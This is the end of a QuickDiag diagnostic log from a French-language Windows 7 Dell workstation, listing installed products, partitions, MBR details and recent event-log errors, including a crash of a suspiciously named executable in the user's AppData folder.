[HKCR\Installer\Products\57DBDFEE9DB0F5CAF81609C3A6910CDE] : CCC Help Dutch -> C:\Windows\Installer\{EEFDBD75-0BD9-AC5F-8F61-903C6A19C0ED}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\6030E61781384634B8F8C04C9E73B6CA] : Analyseur et SDK MSXML 4.0 SP2
[HKCR\Installer\Products\62BB44C1149144BD5D8E4C558FE96E6E] : Catalyst Control Center Next Localization TH -> C:\Windows\Installer\{1C44BB26-1941-DB44-D5E8-C455F89EE6E6}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\630956F07C4122645950530ACD3925A6] : System Requirements Lab
[HKCR\Installer\Products\68AB67CA408033019195008142811430] : Adobe Refresh Manager -> C:\Windows\Installer\{AC76BA86-0804-1033-1959-001824184103}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\68AB67CA7DA76301B744CAF070E41400] : Adobe Acrobat Reader DC - Français -> C:\Windows\Installer\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}\SC_Reader.ico
[HKCR\Installer\Products\6B1D806538463AF927792CFC3CCF7E74] : Catalyst Control Center Next Localization KO -> C:\Windows\Installer\{5608D1B6-6483-9FA3-7297-C2CFC3FCE747}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\6D746933772AF479FF9238AC264855B9] : CCC Help German -> C:\Windows\Installer\{339647D6-A277-974F-FF29-83CA6284559B}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\6ED2F49D4B55112B3A184580B97C190A] : CCC Help Japanese -> C:\Windows\Installer\{D94F2DE6-55B4-B211-A381-54089BC791A0}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\70424182DACADCE46A6BF98A74F10626] : Scarface: The World is Yours -> C:\Windows\Installer\{28142407-ACAD-4ECD-A6B6-9FA8471F6062}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\74A569CF9384AC046B81814F680F246C] : Skype™ 7.31 -> C:\Windows\Installer\{FC965A47-4839-40CA-B618-18F486F042C6}\SkypeIcon.exe
[HKCR\Installer\Products\7D94FB6FE974EF328A9A361D390D6579] : AMD Drag and Drop Transcoding -> C:\Windows\Installer\{F6BF49D7-479E-23FE-A8A9-63D193D05697}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\87F495D4D6C0244116CC497D53EF0CD5] : CCC Help English -> C:\Windows\Installer\{4D594F78-0C6D-1442-61CC-94D735FEC05D}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\8A285624F202C31DB85D0F5015ABCF39] : AMD Wireless Display v3.0 -> C:\Windows\Installer\{426582A8-202F-D13C-8BD5-F00551BAFC93}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\8CA5BAB353FE0DEFCBBE39600DE5EDC1] : Catalyst Control Center Next Localization RU -> C:\Windows\Installer\{3BAB5AC8-EF35-FED0-BCEB-9306D05EDE1C}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\8FC229B8C6A8EC148A851F57D5F7D592] : NVIDIA PhysX -> C:\Windows\Installer\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}\icon.ico
[HKCR\Installer\Products\9321B7367B48F0B052940702AC758C13] : CCC Help Thai -> C:\Windows\Installer\{637B1239-84B7-0B0F-2549-7020CA57C831}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\93BAD29AC2E44034A96BCB446EB8552E] : Google Update Helper
[HKCR\Installer\Products\9428F05400192FC5E1562765F013FCC2] : AMD Wireless Display v3.0 -> C:\Windows\Installer\{450F8249-9100-5CF2-1E65-72560F31CF2C}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\9632A9C2D2617DA75DF0F595EC8C0A64] : CCC Help Danish -> C:\Windows\Installer\{2C9A2369-162D-7AD7-D50F-5F59CEC8A046}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\966C8595FB82766D0A406EBF4F8420D7] : CCC Help Spanish -> C:\Windows\Installer\{5958C669-28BF-D667-A004-E6FBF448027D}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\9C8928403D4AB094F99FBA20A329833F] : Steam
[HKCR\Installer\Products\9FF2DF0D9EB1927E8387A906B3F55192] : Catalyst Control Center Localization All -> C:\Windows\Installer\{D0FD2FF9-1BE9-E729-3878-9A603B5F1529}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\A089CE062ADB6BC44A720BA745894BAC] : Google Update Helper
[HKCR\Installer\Products\A484ACF1E9A519C90F0552D7F113A1C0] : Catalyst Control Center Next Localization NL -> C:\Windows\Installer\{1FCA484A-5A9E-9C91-F050-257D1F311A0C}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\A98FDF6256AF2AF4582273CC48FDCDEE] : Mercenaries(tm) 2: l'Enfer des Favelas
[HKCR\Installer\Products\AA6BBEC293CE2FFDF1B5A98903C1D4BA] : Catalyst Control Center Next Localization CS -> C:\Windows\Installer\{2CEBB6AA-EC39-DFF2-1F5B-9A98301C4DAB}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\ADD5FB2D3F2E33A4D85FF442CC502161] : The Witcher 2 Assassins of Kings -> C:\Windows\Installer\{D2BF5DDA-E2F3-4A33-8DF5-4F24CC051216}\icone.exe
[HKCR\Installer\Products\AF5142F82F27920F4005E42BAF4E485C] : AMD Accelerated Video Transcoding -> C:\Windows\Installer\{8F2415FA-72F2-F029-0450-4EB2FAE484C5}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\B31E184761CE41B1E0238E1856DCC475] : Catalyst Control Center Graphics Previews Common -> C:\Windows\Installer\{7481E13B-EC16-1B14-0E32-E88165CD4C57}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\B380454580315844FB71110100D03810] : Grand Theft Auto IV
[HKCR\Installer\Products\B380454580315844FB71110100D03820] : Grand Theft Auto IV
[HKCR\Installer\Products\B51416D2C99F16184F2567B0E6444182] : CCC Help Hungarian -> C:\Windows\Installer\{2D61415B-F99C-8161-F452-760B6E441428}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\B70CCCE83E38778362FD18C52D3B7094] : CCC Help Italian -> C:\Windows\Installer\{8ECCC07B-83E3-3877-26DF-815CD2B30749}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\BC62F7EB19E637671703083CF6FB31ED] : Catalyst Control Center Next Localization TR -> C:\Windows\Installer\{BE7F26CB-6E91-7673-7130-80C36FBF13DE}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\BCFF0F405A9D23326279AC740C24A42F] : Catalyst Control Center Next Localization IT -> C:\Windows\Installer\{04F0FFCB-D9A5-2332-2697-CA47C0424AF2}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\C15C7DB84CC082E3FCCD7F4D5C857338] : CCC Help Finnish -> C:\Windows\Installer\{8BD7C51C-0CC4-3E28-CFDC-F7D4C5583783}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\C1CFB2FCF74FD29FCF748682F1677E70] : AMD Settings -> C:\Windows\Installer\{CF2BFC1C-F47F-F92D-FC47-68281F76E707}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\C5FFB12DAA1551C4C119A60178DF3C37] : Catalyst Control Center Next Localization HU -> C:\Windows\Installer\{D21BFF5C-51AA-4C15-1C91-6A1087FDC373}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\C680E647A320C97ABD1E60E277F36F8C] : Catalyst Control Center Next Localization SV -> C:\Windows\Installer\{746E086C-023A-A79C-DBE1-062E773FF6C8}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\C6C9570D10F1D543F8953E4B93777D45] : Google Chrome
[HKCR\Installer\Products\CDFF2F74A6D36DECB045E607285D2BB9] : Catalyst Control Center Next Localization JA -> C:\Windows\Installer\{47F2FFDC-3D6A-CED6-0B54-6E7082D5B29B}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\D0BF8DB47049D9244C21AF0E3A818AEA] : CCC Help Polish -> C:\Windows\Installer\{4BD8FB0D-9407-429D-C412-FAE0A318A8AE}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\D25657E31B99E7141B36EB3FC3DAF361] : League of Legends -> C:\Windows\Installer\{3E75652D-99B1-417E-B163-BEF33CAD3F16}\lol.launcher_1.exe
[HKCR\Installer\Products\D5A97F532E0091C89D92E258ED4A52D2] : Catalyst Control Center Next Localization CHT -> C:\Windows\Installer\{35F79A5D-00E2-8C19-D929-2E85DEA4252D}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\D5D6BABB4DD164D45B9D21D1AC1BD7CE] : Battlestations: Pacific -> C:\Windows\Installer\{BBAB6D5D-1DD4-4D46-B5D9-121DCAB17DEC}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\DB6C932AD191FF36231C8723CEB2BBFF] : AMD Settings -> C:\Windows\Installer\{A239C6BD-191D-63FF-32C1-7832EC2BBBFF}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\DF5BBABC96DB969827A965951ED15981] : Catalyst Control Center Next Localization DE -> C:\Windows\Installer\{CBABB5FD-BD69-8969-729A-5659E11D9518}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\E06ECA877BC05394CB4D3F4322016570] : AMD Settings - Branding -> C:\Windows\Installer\{78ACE60E-0CB7-4935-BCD4-F33422105607}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\E2D6787FDCDC35ECE08899B5759AB485] : Catalyst Control Center Next Localization PL -> C:\Windows\Installer\{F7876D2E-CDCD-CE53-0E88-995B57A94B58}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\E6B0F50F99990D553C320DD60F2E5BF9] : Catalyst Control Center Next Localization DA -> C:\Windows\Installer\{F05F0B6E-9999-55D0-C323-D06DF0E2B59F}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\EA30BF8D623A21C0CA748B89EF37AF49] : Catalyst Control Center Next Localization NO -> C:\Windows\Installer\{D8FB03AE-A326-0C12-AC47-B898FE73FA94}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\EC949889A9ED781D0A01229B80F58B31] : CCC Help Swedish -> C:\Windows\Installer\{988949CE-DE9A-D187-A010-22B9085FB813}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\F31F3EF073A8AB649F3767F2188E333C] : CCC Help French -> C:\Windows\Installer\{0FE3F13F-8A37-46BA-F973-762F81E833C3}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\F41A983F429B826EE4F4D839FA0B12F5] : AMD Install Manager -> C:\Windows\Installer\{F389A14F-B924-E628-4E4F-8D93AFB0215F}\ARPPRODUCTICON.exe
[HKCR\Installer\Products\F60730A4A66673047777F5728467D401] : Java Auto Updater

---------- | ADS

@C:\Users\PC\AppData\Local:init

---------- | Drives

 Disk: 0   Size=14.3T
 Pos MBRndx Type/Name  Size Active Hide Start Sector   Sectors
 --- ------ ---------- ---- ------ ---- ------------ ------------
  0    0    07-NTFS    100M   Yes   No         2,048      204,800
  1    1    07-NTFS    500G   No    No       206,848  023,795,200
  2    2    07-NTFS    931G   No    No   024,002,048  906,272,256

---------- | MBR

Windows Version:		Windows 7 Professional
Windows Information:		Service Pack 1 (build 7601), 64-bit
Base Board Manufacturer:	Dell Inc.
BIOS Manufacturer:		Dell Inc.
System Manufacturer:		Dell Inc.
System Product Name:		Precision WorkStation T5500
Logical Drives Mask:		0x0000005c

Analysis of file "C:\QuickDiag\MBR.bin":
Windows 7 MBR code detected

64 bits not supported by MBR.exe, Dump : C:\QuickDiag\MBR.Bin

---------- | 20 LastEventLog

La création du contexte d’activation a échoué pour « C:\Users\PC\Downloads\vcredist_arm.exe ». Assembly dépendant Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="arm",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0" introuvable. Utilisez sxstrace.exe pour un diagnostic détaillé.
------------

La création du contexte d’activation a échoué pour « c:\program files (x86)\Nero\nero toolkit\nero discspeed\DiscSpeed.exe ». Erreur dans le fichier de manifeste ou de stratégie «  » à la ligne . Une version de composant nécessaire à l’application est en conflit avec une autre version de composant déjà active. Les composants en conflit sont : Composant 1 : C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Composant 2 : C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.
------------

La création du contexte d’activation a échoué pour « c:\program files\CCleaner\CCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie «  » à la ligne . Une version de composant nécessaire à l’application est en conflit avec une autre version de composant déjà active. Les composants en conflit sont : Composant 1 : C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Composant 2 : C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
------------

La création du contexte d’activation a échoué pour « c:\program files (x86)\Nero\nero toolkit\nero discspeed\DiscSpeed.exe ». Erreur dans le fichier de manifeste ou de stratégie «  » à la ligne . Une version de composant nécessaire à l’application est en conflit avec une autre version de composant déjà active. Les composants en conflit sont : Composant 1 : C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Composant 2 : C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.
------------

La création du contexte d’activation a échoué pour « c:\program files\CCleaner\CCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie «  » à la ligne . Une version de composant nécessaire à l’application est en conflit avec une autre version de composant déjà active. Les composants en conflit sont : Composant 1 : C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Composant 2 : C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
------------

Nom de l’application défaillante FlashPlayerInstaller.exe, version : 26.0.0.137, horodatage : 0x594d545c
Nom du module défaillant : ntdll.dll, version : 6.1.7601.23572, horodatage : 0x57fd02d3
Code d’exception : 0xc0000005
Décalage d’erreur : 0x00032c59
ID du processus défaillant : 0x124
Heure de début de l’application défaillante : 0x01d2fa488870ac48
Chemin d’accès de l’application défaillante : C:\Windows\SysWOW64\FlashPlayerInstaller.exe
Chemin d’accès du module défaillant: C:\Windows\SysWOW64\ntdll.dll
ID de rapport : c77cb4e7-663b-11e7-a254-002564c1926c
------------

Nom de l’application défaillante cnext.exe, version : 10.1.1.1522, horodatage : 0x56d0b595
Nom du module défaillant : unknown, version : 0.0.0.0, horodatage : 0x00000000
Code d’exception : 0xc000041d
Décalage d’erreur : 0x0000000000000000
ID du processus défaillant : 0xf0c
Heure de début de l’application défaillante : 0x01d2fa473c53d07f
Chemin d’accès de l’application défaillante : C:\Program Files\AMD\CNext\CNext\cnext.exe
Chemin d’accès du module défaillant: unknown
ID de rapport : fcc18749-663a-11e7-a254-002564c1926c
------------

Nom de l’application défaillante cnext.exe, version : 10.1.1.1522, horodatage : 0x56d0b595
Nom du module défaillant : unknown, version : 0.0.0.0, horodatage : 0x00000000
Code d’exception : 0xc0000005
Décalage d’erreur : 0x0000000000000000
ID du processus défaillant : 0xf0c
Heure de début de l’application défaillante : 0x01d2fa473c53d07f
Chemin d’accès de l’application défaillante : C:\Program Files\AMD\CNext\CNext\cnext.exe
Chemin d’accès du module défaillant: unknown
ID de rapport : a178ae95-663a-11e7-a254-002564c1926c
------------

CoID={F7317F0C-1E73-4CC5-993C-70E22D08F8DD} : L’utilisateur PC-PC\PC a composé le numéro de la connexion Modem X080C Plus. La connexion a échoué. Code d’erreur retourné : 797.
------------

CoID={F9F517E7-7C1A-40E6-A201-7E1B40B8E1D9} : L’utilisateur PC-PC\PC a composé le numéro de la connexion Modem X080C Plus. La connexion a échoué. Code d’erreur retourné : 797.
------------

CoID={B5B13988-5BE5-4319-A341-9D5BD022BC96} : L’utilisateur PC-PC\PC a composé le numéro de la connexion Modem X080C Plus. La connexion a échoué. Code d’erreur retourné : 797.
------------

CoID={EBD1D378-BF18-412E-A3F1-DBC6A0BD452A} : L’utilisateur PC-PC\PC a composé le numéro de la connexion Modem X080C Plus. La connexion a échoué. Code d’erreur retourné : 797.
------------

CoID={7A16D12B-D8D7-46B8-AA00-8C952C6CA468} : L’utilisateur PC-PC\PC a composé le numéro de la connexion Modem X080C Plus. La connexion a échoué. Code d’erreur retourné : 797.
------------

Nom de l’application défaillante wgjjfure.exe, version : 2.0.0.6, horodatage : 0x4a24eca4
Nom du module défaillant : unknown, version : 0.0.0.0, horodatage : 0x00000000
Code d’exception : 0xc0000005
Décalage d’erreur : 0x00292e7f
ID du processus défaillant : 0xfb4
Heure de début de l’application défaillante : 0x01d2f7fc4a087d65
Chemin d’accès de l’application défaillante : C:\Users\PC\AppData\Roaming\Microsoft\jrirrird\wgjjfure.exe
Chemin d’accès du module défaillant: unknown
ID de rapport : a2ec545c-63ef-11e7-b7ec-002564c1926c
------------

Nom de l’application défaillante msiexec.exe, version : 5.0.7601.23593, horodatage : 0x582346da
Nom du module défaillant : unknown, version : 0.0.0.0, horodatage : 0x00000000
Code d’exception : 0xc0000005
Décalage d’erreur : 0x6ae856de
ID du processus défaillant : 0x129c
Heure de début de l’application défaillante : 0x01d2f7e9be2f5068
Chemin d’accès de l’application défaillante : C:\Windows\SysWOW64\msiexec.exe
Chemin d’accès du module défaillant: unknown
ID de rapport : efc1acbd-63e8-11e7-bd42-002564c1926c
------------

Nom de l’application défaillante Hearts_of_Iron_IV_Death_or_Dishonor_Update_v1_4.exe, version : 0.0.0.0, horodatage : 0x5927fce5
Nom du module défaillant : Hearts_of_Iron_IV_Death_or_Dishonor_Update_v1_4.exe, version : 0.0.0.0, horodatage : 0x5927fce5
Code d’exception : 0xc0000005
Décalage d’erreur : 0x000098d8
ID du processus défaillant : 0x1064
Heure de début de l’application défaillante : 0x01d2f7f075d64d99
Chemin d’accès de l’application défaillante : C:\Users\PC\AppData\Local\Temp\freearcef49a062.tmp\Hearts_of_Iron_IV_Death_or_Dishonor_Update_v1_4.exe
Chemin d’accès du module défaillant: C:\Users\PC\AppData\Local\Temp\freearcef49a062.tmp\Hearts_of_Iron_IV_Death_or_Dishonor_Update_v1_4.exe
ID de rapport : 868d9f8f-63e6-11e7-bd42-002564c1926c
------------

Nom de l’application défaillante Setup.exe_t, version : 10.0.47484.0, horodatage : 0x595e2af0
Nom du module défaillant : Setup.exe, version : 10.0.47484.0, horodatage : 0x595e2af0
Code d’exception : 0xc0000005
Décalage d’erreur : 0x0004e616
ID du processus défaillant : 0x19f4
Heure de début de l’application défaillante : 0x01d2f7f08aead5fb
Chemin d’accès de l’application défaillante : C:\Users\PC\AppData\Local\Temp\1f0877ab0c2047ae882d110b8cd4a28f\Setup.exe
Chemin d’accès du module défaillant: C:\Users\PC\AppData\Local\Temp\1f0877ab0c2047ae882d110b8cd4a28f\Setup.exe
ID de rapport : ccfaea5d-63e3-11e7-bd42-002564c1926c
------------

La création du contexte d’activation a échoué pour « c:\program files\CCleaner\CCleaner.exe ». Erreur dans le fichier de manifeste ou de stratégie «  » à la ligne . Une version de composant nécessaire à l’application est en conflit avec une autre version de composant déjà active. Les composants en conflit sont : Composant 1 : C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Composant 2 : C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
------------

La création du contexte d’activation a échoué pour « c:\program files (x86)\Nero\nero toolkit\nero discspeed\DiscSpeed.exe ». Erreur dans le fichier de manifeste ou de stratégie «  » à la ligne . Une version de composant nécessaire à l’application est en conflit avec une autre version de composant déjà active. Les composants en conflit sont : Composant 1 : C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Composant 2 : C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.
------------


----------( EOF)---------- - 4261 | 22:35:06